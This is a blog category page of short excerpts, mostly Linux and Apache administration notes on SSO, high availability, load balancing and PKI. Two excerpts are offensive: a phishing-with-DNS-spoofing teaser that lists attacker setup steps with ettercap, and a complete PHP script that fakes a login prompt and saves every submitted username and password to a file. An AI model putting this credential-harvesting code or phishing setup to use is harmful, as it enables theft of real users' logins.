This category contains 11 posts

How Phishing Works along with Dns Spoofing

This is for Educational Purposes Only!! This post describes how Phishing works. Many howtos exist on Internet but dont┬ádo the job┬ásilently and the victim understands that something goes wrong … Attacker’s Side IP: 1. install ettercap 2. install Apache with php support 3. Make sure with ping command that facebook.com points to or … Continue reading

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

The Web Server is not sending the required intermediate certificate through a SECURE HTTPS Session

Some System admins forget to configure the intermediate Certificate and the SSL handshake between browser and Web Server returns ; Verify return code: 21 (unable to verify the first certificate) and not Verify return code: 0 (ok) # openssl s_client -connect http://www.vivodi.gr:443 -state New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 1024 bit SSL-Session: … Continue reading

Linux High Availability (Linux-HA)

Linux-HA – RHEL 5.3 x86_64 installation Notes 1.Install the following Prerequisite packages # yum install e2fsprogs-devel.x86_64 # yum install glib2-devel.x86_64 # yum install gnutls-devel.x86_64 # yum install ncurses-devel.x86_64 # yum install pam-devel.x86_64 # yum install python-devel.x86_64 # yum install perl-TimeDate.noarch 2.Download LINUX-HA Packages from openSUSE repo; http://download.opensuse.org/repositories/server:/ha-clustering/RHEL_5/x86_64/ – heartbeat-2.99.2-8.1.x86_64.rpm – heartbeat-common-2.99.2-8.1.x86_64.rpm – heartbeat-resources-2.99.2-8.1.x86_64.rpm – libheartbeat2-2.99.2-8.1.x86_64.rpm … Continue reading

A Simple PHP Authenticator which logs users’ usernames and passwords

<?php if (!isset($_SERVER[‘PHP_AUTH_USER’])) { header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } else { $a=$_SERVER[‘PHP_AUTH_USER’]; $b=$_SERVER[‘PHP_AUTH_PW’]; $myFile = “./testFile.txt”; $fh = fopen($myFile, ‘a’) or die(“ferror!!!”); fwrite($fh, $a); fwrite($fh,”\n”); fwrite($fh, $b); fwrite($fh,”\n”); fwrite($fh,”——————-\n”); fclose($fh); header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } ?> # tail -f testFile.txt ——————- … Continue reading

Using Pen, mod_rewrite and mod_proxy Apache modules to perform selective url based loadbalancing/fail-over with “n” backend servers

1.Download Pen through the following link ; http://siag.nu/pen/ 2.raise the file descriptor limits by editing the /usr/include/linux/posix_types.h and /usr/include/bits/typesizes.h as follows ; change : #define __FD_SETSIZE 1024 to : #define __FD_SETSIZE 10240 and then compile Pen 3. Launch Pen as follows; ./pen -x 5000 -d -d -f 8280 server1:8280 server2:8280 4. Apache Configuration RewriteEngine on … Continue reading

MySQL Driven Apache NCSA Log Parser – Linux Ansi C (gcc)

mysql> desc apacheLog; +———+————–+——+—–+———+——-+ | Field | Type | Null | Key | Default | Extra | +———+————–+——+—–+———+——-+ | myDATE | datetime | NO | | NULL | | | hosts | varchar(255) | NO | | NULL | | | method | char(4) | NO | | NULL | | | url | varchar(255) … Continue reading

keepalived with VRRP and LVS Support under RHEL 5.3 x86_64

# yum -y install kernel-devel # yum install openssl-devel # wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz # wget http://www.kernel.org/pub/linux/kernel/v2.6/linux- # tar zxvf linux- # cp -r linux- /lib/modules/2.6.18-128.el5/build/net/ # ./configure –with-kernel-dir=/lib/modules/2.6.18-128.el5/build Keepalived configuration ———————— Keepalived version : 1.1.17 Compiler : gcc Compiler flags : -g -O2 Extra Lib : -lpopt -lssl -lcrypto Use IPVS Framework : Yes IPVS sync … Continue reading

Authenicate Apache Against Active Directory (SSO) – Eponymous LDAP Bind

// Apache Module // LoadModule authz_ldap_module modules/mod_authz_ldap.so // Apache Module // [Directory “/var/www/html”] AuthType Basic # What the users will see as a “title” of the login prompt: AuthName “Domain Credentials Required” # use plain LDAP authentication: AuthzLDAPMethod ldap # FQDN resolvable hostname (or IP) of the Windows # AD domain controller: AuthzLDAPServer # … Continue reading

Apache PKI Implementation

#openssl pkcs12 -clcerts -export -inkey server.key -in server.crt -out clientKey.p12 #openssl pkcs12 -clcerts -nokeys -in clientKey.p12 -out CA_pilio.crt.pem #cp CA_pilio.crt.pem CA_pilio.crt // Apache SSL Configuration // SSLVerifyClient require SSLVerifyDepth 1 SSLCACertificateFile /etc/pki/tls/certs/CA_pilio.crt // Apache SSL Configuration // clientKey.p12 client SSL Key must be loaded in your web browser

sample integrations

Samples …